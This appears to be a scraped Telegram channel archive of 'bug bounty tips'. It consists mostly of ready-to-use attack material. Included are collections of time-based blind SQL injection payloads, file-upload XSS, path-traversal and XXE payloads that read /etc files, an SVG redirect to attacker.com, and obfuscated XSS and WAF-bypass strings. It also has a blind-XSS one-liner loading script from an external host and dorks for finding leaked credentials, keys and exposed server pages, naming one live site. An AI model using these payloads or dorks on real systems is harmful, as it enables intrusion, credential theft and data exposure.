Bug bounty Tips
Kanalga Telegramโda oโtish
๐ก๏ธ Cybersecurity enthusiast | ๐ป Helping secure the digital world | ๐ Web App Tester | ๐ต๏ธโโ๏ธ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish5 846
Obunachilar
+1624 soatlar
+677 kunlar
+37530 kunlar
Postlar arxiv
5 849
๐จSubdominator - Unleash the Power of Subdomain Enumeration๐จ
๐ขSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
๐Link- https://github.com/RevoltSecurities/Subdominator
5 849
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips5 849
Repost from Bug Bounty
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips5 849
this is the top xor blind payloads i collected that most guys used including my personal also that will sure help you :)
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true
polyglots payloads:
if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
5 849
๐ฅChaining Vulnerabilities through File Upload๐ฅ
SLQiโณ
'sleep(20).jpg sleep(25)-- -.jpgPath traversalโณ
../../etc/passwd/logo.png
../../../logo.png
XSSโณ
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1โฆ"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect โณ
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE โณ
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>5 849
๐ฅ๐ฅGithub-Dork๐๐๐ฅ๐ฅ
Happy Hunting
๐ api_key
๐ app_AWS_SECRET_ACCESS_KEY
๐ app_secret
๐ authoriztion
๐ Ldap
๐ aws_access_key_id
๐ secret
๐ bash_history
๐ bashrc%20password
๐ beanstalkd
๐ client secre
๐ composer
๐ config
๐ credentials
๐ DB_PASSWORD
๐ dotfiles
๐ .env file
๐ .exs file
๐ extension:json mongolab.com
๐ extension:pem%20private
๐ extension:ppk private
๐ extension:sql mysql dump
๐ extension:yaml mongolab.com
๐ .mlab.com password
๐ mysql
๐ npmrc%20_auth
๐ passwd
๐ passkey
๐ rds.amazonaws.com password
๐ s3cfg
๐ send_key
๐ token
๐ filename:.bash_history
๐ filename:.bash_profile aws
๐ filename:.bashrc mailchimp
๐ filename:CCCam.cfg
๐ filename:config irc_pass
๐ filename:config.php dbpasswd
๐ filename:config.json auths
๐ filename:config.php pass
๐ filename:config.php dbpasswd
๐ filename:connections.xml
๐ filename:.cshrc
๐ filename:.git-credentials
๐ filename:.ftpconfig
๐ filename:.history
๐ filename:gitlab-recovery-codes.txt
๐ filename:.htpasswd
๐ filename:id_rsa
๐ filename:.netrc password
๐ FTP
๐ filename:wp-config.php
๐ git-credentials
๐ github_token
๐ HEROKU_API_KEY language:json
๐ HEROKU_API_KEY language:shell
๐ GITHUB_API_TOKEN language:shell
๐ oauth
๐ OTP
๐ databases password
๐ [WFClient] Password= extension:ica
๐ xoxa_Jenkins
๐ security_credentials
#bugbountytips #GitHub
5 849
Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden /api/Docs/index.html ==> 200 Ok
5 849
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.
Dork: site:*.example.com inurl:login | inurl:signin Google
5 849
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a Vulnerable Site- https://www.itronot.co.il/server-status
5 849
Google Dork - High % keywords ๐
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
5 849
Google Dork - Server Errors โก
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
5 849
Google Dork - Sensitive Docs ๐
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:โconfidentialโ | intext:โNot for Public Releaseโ | intext:โinternal use onlyโ | intext:โdo not distributeโ
5 849
๐ขa XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)
๐='',๐บ=!๐+๐,๐=!๐บ+๐,๐บ=๐+{},๐=๐บ[๐++],
๐=๐บ[๐ซ=๐],๐=++๐ซ+๐,๐น=๐บ[๐ซ+๐],๐บ[๐น+=๐บ[๐]
+(๐บ.๐+๐บ)[๐]+๐[๐]+๐+๐+๐บ[๐ซ]+๐น+๐+๐บ[๐]
+๐]๐น")()
(Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
5 849
New XSS Bypass Cloudflare WAF ๐งฑ
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
5 849
๐ซกAutomate Your XSS
#!/bin/bash read TARGET subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt cat waybackurls.txt | dalfox pipe
5 849
Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"
5 849
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
5 849
XSS Tip: If alert() is being converted to ALERT() and you can use Like
onerror="๐='',๐จ=!๐+๐,๐=!๐จ+๐,๐=๐+{},๐=๐จ[๐++],๐ต=๐จ[๐=๐],๐=++๐+๐,๐ =๐[๐+๐],๐จ[๐ +=๐[๐]+(๐จ.๐+๐)[๐]+๐[๐]+๐+๐ต+๐จ[๐]+๐ +๐+๐[๐]+๐ต][๐ ](๐[๐]+๐[๐]+๐จ[๐]+๐ต+๐+'(๐)')()"
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
